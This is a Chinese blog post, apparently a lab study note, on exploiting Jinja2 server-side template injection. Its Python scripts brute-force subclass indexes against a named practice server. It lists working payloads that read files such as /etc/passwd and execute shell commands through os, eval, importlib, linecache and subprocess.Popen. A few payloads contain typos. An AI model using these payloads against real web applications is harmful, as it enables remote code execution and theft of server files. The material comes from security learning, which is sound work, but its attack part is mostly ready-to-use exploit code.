ssti 常见注入模块利用

最新推荐文章于 2024-10-06 16:55:59 发布
最新推荐文章于 2024-10-06 16:55:59 发布
阅读量252 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/133718117
版权

文件读取

python脚本(这里以重庆橙子科技jinjia2模板注入为例)

import requests
url = 'http://39.104.177.130:18080/flaskBasedTests/jinja2/'
for i in range(500):
    data = {"name":"{{().__class__.__base__.__subclasses__()["+str(i)+"]}}"}
    try:
        response = requests.post(url,data=data)
        #print(response.text)
        if response.status_code == 200:
            if '_frozen_importlib_external.FileLoader' in response.text:
                print(i)
    except:
        pass

 

使用hackbar测试一下

使用bp,看不到passwd,直接读取flag

get_data是 FileLoader 对象的一个方法,用于获取指定文件的内容。

利用时第一个参数为 0 ,第二个参数为文件路径即可。

内建函数eval执行命令

内建函数: python在执行脚本时自动加载的函数

python脚本查看可利用内建函数eval的模块(还是以jinjia2为例)

import requests
url = 'http://39.104.177.130:18080/flaskBasedTests/jinja2/'
for i in range(500):
    data = {"name":
"{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"}
    try:
        response = requests.post(url,data=data)
        #print(response.text)
        if response.status_code == 200:
            if 'eval' in response.text:
                print(i)
    except:
        pass

利用内建函数 eval() 和 popen() 执行系统命令

__builtins__: 提供对Python的所有“内置“标识符的直接访问。

eval(): 计算字符串表达式的值。

__import__: 加载 os 模块。

popen(): 执行一个 shell 以运行命令来开启一个进程,执行 cat /etc/passwd 。

popen() 执行命令后没有直接回显,最后加个 read() 函数读取回显内容

os模块执行命令

在其他函数中直接调用os模块

通过config,调用os
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

通过url for,调用os
{{url_for.__globals__.os.popen.('whoami').read()}}

在已经加载os模块的子类里直接调用os模块
{{".__clases__bases__[0].__subclasses__()[199].__init__.__globals__['os'].popen("ls -l/opt").read()}}

python脚本查找已经加载os模块的子类

import requests
url = 'http://39.104.177.130:18080/flaskBasedTests/jinja2/'
for i in range(500):
    data = {"name": 
"{{().__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__}}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if "os.py" in response.text:
            print(i)

 

构造paylaod

name={{''.__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['os'].popen("ls -l /opt").read()}}

 

importlib类执行命令

可以加载第三方库,使用load module加载os

python脚本查找 frozen importlib.Builtinlmporter

import requests
url = ''
for i in range(500):
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "]}}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if "_frozen_importlib.BuiltinImporter" in response.text:
            print(i)

 

name={{''.__class__.__base__.__subclasses__()[69]["load_module"]("os")["popen"]("ls -l /opt").read()}}

 

linecache函数执行命令

linecache函数可用于读取任意一个文件的某一行,而这个函数中也引入了os 模块,所以我们也可以利用这个 linecache 函数去执行命令。

python脚本查找linecache

import requests
url = 'http://39.104.177.130:18080/flaskBasedTests/jinja2/'
for i in range(500):
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "].__init__.__globals__}}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if "linecache" in response.text:
            print(i)


name={{().__class__.__base__.__subclasses__()[191].__init__.__globals__["linecache"]["os"].popen("ls -l /").read()}}

 

subprocess.Popen 类执行命令 

subprocess 模块允许你生成新的进程,连接它们的输入、输出、错误管道,并且获取它们的返回码。此模块打算代替一些老旧的模块与功能:os.system os.spawn*。—Python 文档

简单地说,这个模块也可以执行 shell 命令。

import requests
url = 'http://39.104.177.130:18080/flaskBasedTests/jinja2/'
for i in range(500):
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "]}}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if "subprocess.Popen" in response.text:
            print(i)

 

name={{[].__class__.__base__.__subclasses__()[200]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}

shell=True:这是一个参数,指示在执行命令时使用系统的命令解释器(如 /bin/sh 或 cmd.exe)。

stdout=-1:这是一个参数,用于指定输出流的处理方式。在这里,-1 表示将输出流重定向到subprocess.PIPE,以便在后续步骤中获取输出。

.communicate():这是 Popen 对象的一个方法,用于与子进程进行通信。它会等待子进程执行完毕,并返回一个元组,其中包含子进程的标准输出和标准错误输出。

[0]:这是获取 .communicate() 返回的元组中的第一个元素,即子进程的标准输出。

.strip():这是一个字符串方法,用于去除字符串两端的空白字符。

 

木…
关注
Web安全漏洞——SSTI模版注入(初级)
m0_61506558的博客
11-12 1504
(这里特指用于Web开发的模版引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模版引擎来生成前端的html代码,模版引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模版+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前(如图一)。模版引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。(一)简介用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。
基于SSTI模块注入的常用payload总结
Welcome To Myon'Blog !
07-05 1312
一、查找函数位置,利用函数实现 1、利用file函数进行读取 2、利用内嵌函数eval进行命令执行 3、利用linecache函数进行命令执行 二、查找类的位置,利用类下的函数实现 1、利用_frozen_importlib_external.FileLoader类 2、利用importlib类进行命令执行 3、利用subprocess.Popen类进行命令执行 三、利用os模块进行命令执行 1、利用config 2、利用url_for 3、利用子类的os模块 四、关于其他的利用
SSTI利用脚本
qq_42529356的博客
02-14 492
import requests headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'} def find_popen(url,payload): '发现popen在object中的位置' num=0 while True: try: payload1 = '{'+payload.form
二分法跑SSTI盲注脚本
最新发布
Small_Dong_0_o的博客
10-06 211
测试环境:ctf秀-web入门-ssti-web361/web368。
fask--SSTI模块注入
qq_43613772的博客
08-01 565
一些简单注入 {{config}}可以获取当前设置 {{self}} {{self.__dict__._TemplateReference__context.config}} 同样可以看到config __class__ 返回类型所属的对象 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表 __init__ 类的初始化方法 __globals__ 对包含函数全局变量的字典的引用 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解
SSTI注入
金灰的博客
08-01 875
要计算PIN码,需要private_bits 和public_bits分别需要确定的是:1 python运行的脚本名2 固定值 flask.app3 固定值 Flask4 当前脚本运行的绝对路径 --可以从报错获取。
SSTI模板注入
google20的博客
07-21 1052
SSTI模板注入
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3778
web安全-SSTI模板注入漏洞
关于flask的SSTI注入
Kr的博客
01-21 7262
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
从ofcms的模板注入漏洞(CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 2009
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
python ssti正确利用方式
qq_49973474的博客
05-11 841
很好 很有精神
SSTI 服务端模板注入 / 沙盒逃逸
Kaleido76的博客
02-16 553
这个部分之前一直只会生搬硬套,其实到底是什么回事都不太清楚,这次查了很多资料,把这部分内容的思路整理一下。
Python中的SSTI (一)
qq_43511094的博客
03-21 5731
模板注入什么是Flask什么是SSTI什么是JinJa2什么是模板引擎Jinja2 详细知识基本语法基本用法一般用法for语句的使用if 语句继承filter 语句的使用空白行处理类的详细知识SSTI的payloadpopen()方法python中的SSTI常用的payload 什么是Flask Flask是一个轻量级的python的web框架。轻量级说明他只适用于构建小型网站。 什么是SSTI SSTI,Server-Site Template Injection,即服务器模板注入。同XSS注入,SQL
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 4033
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
SSTI-3 常用模块利用方法
ZQING
08-20 491
SSTI 漏洞的两种利用方式 文件读取(很多适合可配合此法解出 pin 码) RCE 远程代码执行
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值